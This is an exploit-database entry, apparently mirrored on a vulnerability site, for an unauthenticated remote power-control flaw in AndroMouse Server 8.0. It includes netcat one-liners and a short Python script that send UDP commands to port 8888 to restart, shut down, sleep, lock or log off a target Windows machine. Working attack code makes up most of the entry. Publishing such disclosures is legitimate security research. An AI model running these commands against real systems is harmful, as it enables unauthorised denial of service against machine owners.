📄 AndroMouse Server 8.0 Unauthenticated Remote System Control

🗓️ 04 Jul 2025 00:00:00Reported by Chokri HammediType

Unauthenticated remote power control in AndroMouse Server 8.0 allows restart, shutdown, sleep, lock, logoff.

# Exploit Title: AndroMouse Server 8.0 – Unauthenticated Remote System
    Control (Restart, Shutdown, Sleep, Lock)
    # Date: 04/07/25
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: http://andromouse.com
    # Software Link: https://andromouse-server.en.lo4d.com/windows
    # Version: 8.0
    # Tested on: Windows 10
    
    '''
    Description:
    
    Unauthenticated Remote System Control in AndroMouse Server 8.0 allows
    attackers to send UDP commands to remotely restart, shutdown, sleep, lock,
    or log off the target machine without authentication. This leads to
    unauthorized power state manipulation and potential denial of service.
    
    POC:
    
    echo -n "power_key_restart" | nc -u 192.168.8.104 8888
    echo -n "power_key_shutdown" | nc -u 192.168.8.104 8888
    echo -n "power_key_sleep" | nc -u 192.168.8.104 8888
    echo -n "power_key_lock" | nc -u 192.168.8.104 8888
    echo -n "power_key_logoff" | nc -u 192.168.8.104 8888
    
    '''
    
    
    import socket
    import time
    import sys
    
    TARGET_IP = "192.168.8.104"
    TARGET_PORT = 8888
    NEWLINE = b"\x0a"
    RETRY_DELAY = 3
    
    POWER_COMMANDS = {
        "sleep": "power_key_sleep",
        "shutdown": "power_key_shutdown",
        "restart": "power_key_restart",
        "lock": "power_key_lock",
        "logoff": "power_key_logoff"
    }
    
    def send_power_command(command):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
    
        try:
            sock.sendto(POWER_COMMANDS[command].encode() + NEWLINE, (TARGET_IP,
    TARGET_PORT))
            return True
        except Exception:
            return False
        finally:
            sock.close()
    
    if __name__ == "__main__":
        if len(sys.argv) != 2 or sys.argv[1].lower() not in POWER_COMMANDS:
            print(f"Usage: {sys.argv[0]} <{'|'.join(POWER_COMMANDS.keys())}>")
            sys.exit(1)
    
        if send_power_command(sys.argv[1].lower()):
            print(f"Sent {sys.argv[1]} command")
        else:
            print("Failed to send command")

04 Jul 2025 00:00Current

7.5High risk

Vulners AI Score7.5